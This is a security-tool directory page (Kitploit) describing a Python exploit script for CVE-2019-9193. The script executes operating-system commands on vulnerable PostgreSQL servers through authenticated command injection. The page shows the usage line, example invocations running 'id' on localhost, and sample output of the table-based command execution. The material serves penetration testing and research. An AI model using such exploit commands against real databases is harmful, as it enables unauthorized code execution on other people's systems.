Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-9193-Postgresql-RCE — Python exploit script for CVE-2019-9193, enabling remote code execution on vulnerable PostgreSQL databases via authenticated command injection. | Kitploit
Tools/GitHubGitHub/cybersrmutl/cve-2019-9193-postgresql-rce
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlDatabase Security
GitHubcybersrmutl/cve-2019-9193-postgresql-rce

CVE-2019-9193-Postgresql-RCE

Python exploit script for CVE-2019-9193, enabling remote code execution on vulnerable PostgreSQL databases via authenticated command injection.

View Repository
27 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

usage: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]

example: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'

example 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'

output:

[+] Connecting to PostgreSQL Database on 127.0.0.1:5432 [+] Connection to Database established [+] Checking PostgreSQL version [+] PostgreSQL 9.3 is likely vulnerable [+] Creating table _30e173ba7fa5577a86b9e9ecfea13360 [+] Command executed

uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)

[+] Deleting table _30e173ba7fa5577a86b9e9ecfea13360

Download Tool